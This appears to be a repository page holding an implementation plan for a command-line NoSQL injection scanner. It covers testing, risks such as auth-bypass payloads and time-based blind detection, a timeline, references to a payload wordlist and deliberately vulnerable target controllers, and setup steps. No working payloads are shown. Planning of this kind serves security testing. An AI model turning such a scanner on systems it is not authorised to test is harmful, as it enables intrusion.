- Python syntax validation (python -m py_compile on all .py files)
- pip install -r requirements.txt succeeds
- Basic smoke test: python scanner.py --help exits 0

Release Candidates

Full integration test against the vulnerable target app
Dependency audit (pip audit)
Clean install test from fresh venv
Report output validation against schema

Branch and Review Policy

main branch is protected
Feature branches named feature/<description>
At least one reviewer approval required before merge
Squash merges preferred for clean history

10. Risks and Mitigations

Risk 1 (Technical) — The target app's forms use JavaScript-based submission (fetch API), so standard HTML form parsing may miss the actual API endpoints. Mitigation — Implement --endpoints manual override mode; additionally, add JS file scanning to extract fetch/XHR URLs as a best-effort enhancement.

Risk 2 (Security) — A user accidentally runs the scanner against a production system they don't own, causing legal liability. Mitigation — Print mandatory legal disclaimer on startup; require --confirm-external flag for non-localhost targets.

Risk 3 (Operational) — The target app's session management (cookie-based) may cause false positives if a bypass payload sets a session that affects subsequent requests. Mitigation — Reset session (clear cookies) between payload groups; establish fresh baseline before each form's injection round.

Risk 4 (UX/Adoption) — False positives erode user trust and make the tool unreliable for real assessments. Mitigation — Multi-factor heuristic scoring (require both status code change AND body content indicator for "confirmed" confidence); clear confidence labels (confirmed/tentative/speculative) in reports.

Risk 5 (Technical) — Time-based blind detection is inherently noisy — network latency can cause false positives/negatives. Mitigation — Use conservative threshold (payload delay × 0.8); run time-based payloads last; recommend local-network testing for reliable timing results.

11. Milestone Timeline

Week	Phases	Description
Week 1	Phase 0 + Phase 1	Environment setup, models, payloads, utilities
Week 2	Phase 2 + Phase 3	URL validation, crawler, form parser
Week 3	Phase 4	Injection engine with dual content-type support
Week 4	Phase 5 + Phase 6	Response analyzer, severity scoring, report generation
Week 5	Phase 7	CLI entry point, pipeline integration
Week 6	Phase 8 + Phase 9	Testing, validation, documentation, release

12. Definition of Done (Project)

13. Reference Index

ID	Title	Location
R1	Project README — CLI Scanner	README.md
R2	NoSQL Injection Reference Guide	NoSQL Injection.md
R3	NoSQL Injection Wordlist	nosqli_worlist.txt
R4	Vulnerable Target — Server Config	server.js
R5	Mode Auth Flow Test Results	MODE_AUTH_FLOW_TEST_RESULTS.md
R6	Project Tasks Checklist	TASKS.md
R7	NoSQL Testing Guide	NOSQLI_TESTING_GUIDE.md
R8	Vulnerable Auth Controller	vulnAuth.js
R9	Vulnerable Search Controller	vulnSearch.js
R10	Vulnerable Routes	vulnRoutes.js

14. Immediate Next Execution Steps

Create the cli/core/ package: mkdir cli/core && touch cli/core/__init__.py — establish the module structure.
Write core/models.py: Define all dataclasses (FormTarget, Payload, Finding, ScanResult, BaselineResponse, InjectionResult). This is the zero-dependency starting point that all other modules import.
Populate payloads.json: Curate the full payload catalog from the wordlist and reference guide. Validate it loads correctly with json.load().
Write core/utils.py: Implement logging setup, URL helpers, and all constant lists (error signatures, success/failure indicators). Import and test from a REPL.
Write requirements.txt: Add requests>=2.32, beautifulsoup4>=4.12, rich>=13.0, urllib3>=2.0 and run pip install -r requirements.txt to confirm clean installation.

FilesExpand file tree

implementation_plan.md

Latest commit

History

implementation_plan.md

File metadata and controls

NoSQL Injection CLI Scanner — Implementation Plan

Document Control

1. Vision and Outcome

User Flow

2. Scope

In Scope (V1)

Out of Scope (V1)

3. Quality Bar and Success Criteria

Functional Success

Security Success

Performance Success

Operability Success

UX/DX Success

4. Target Architecture

4.1 Core Components

4.2 Proposed Folder/Module Structure

5. Phase Plan

Phase 0 — Requirements and Risk Baseline

Phase 1 — Foundation: Models, Payloads, and Utilities

Phase 2 — URL Validation and Web Crawler

Phase 3 — Form Discovery and Parsing

Phase 4 — Injection Engine

Phase 5 — Response Analysis and Severity Scoring

Phase 6 — Report Generation and Console Output

Phase 7 — CLI Entry Point and Pipeline Integration

Phase 8 — Testing and Validation

Phase 9 — Packaging, Documentation, and Release Readiness

6. Security Plan (Cross-Cutting)

6.1 Threat Model Checklist

6.2 Mandatory Controls

6.3 Security Testing Controls

7. Performance Plan (Cross-Cutting)

7.1 Key Levers

7.2 Recommended Defaults

7.3 Runtime Safeguards

8. Configuration Surface

8.1 Non-Secret Settings

8.2 Secret / Credential Storage

9. CI/CD and Governance Plan

Pull Requests / Merges

Release Candidates

Branch and Review Policy

10. Risks and Mitigations

11. Milestone Timeline

12. Definition of Done (Project)

13. Reference Index

14. Immediate Next Execution Steps